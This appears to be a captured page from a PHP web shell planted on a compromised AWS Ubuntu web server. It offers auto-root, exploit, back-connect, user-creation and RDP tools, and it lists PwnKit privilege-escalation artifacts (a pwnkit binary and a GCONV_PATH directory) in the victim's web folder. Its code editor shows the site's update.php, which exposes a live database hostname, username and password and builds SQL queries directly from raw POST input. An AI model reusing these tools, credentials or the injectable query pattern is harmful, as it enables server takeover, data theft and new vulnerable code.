Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.216.156.226
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
tadabills /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
libs
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
.tadabills.php
3.61
KB
-rw-r--r--
Registrationpage.html
5.54
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
barcode_test.php
1.8
KB
-rwxr-xr-x
cconfig.php
1.57
KB
-rwxr-xr-x
getdata.php
3.25
KB
-rwxr-xr-x
index.html
36.1
KB
-rwxr-xr-x
index_old.html
4.82
KB
-rwxr-xr-x
loginapp.php
1.11
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
resume_det.php
2.59
KB
-rwxr-xr-x
resume_det_old.php
2.95
KB
-rwxr-xr-x
resume_det_old1.php
1.73
KB
-rwxr-xr-x
secondtadabill.html
14.96
KB
-rw-r--r--
update.php
740
B
-rwxr-xr-x
upload_file.php
763
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update.php
<?php error_reporting(E_ALL); ini_set('display_errors', 'on'); $mobileno=$_POST['mobileno']; $remarks=$_POST['remarks']; $tabstatus=$_POST['tabstatus']; $servername = "logisys.cluster-cv9maxyrxjgg.ap-south-1.rds.amazonaws.com"; $username = "admin"; $password = "Logisys2104"; $conn = new mysqli($servername,$username,$password); if(!$conn) { die("Connection failed: " . mysqli_connect_error()); } $db = "logisys3_comexam"; $query = "update {$db}.jobdet set fremarks='{$remarks}',fstatus='{$tabstatus}' WHERE fmobile='{$mobileno}'"; //var_dump($query); $result = mysqli_query($conn, $query); if($result) { echo "Updated Successfully"; } else { echo "Updation failed"; } ?>
Close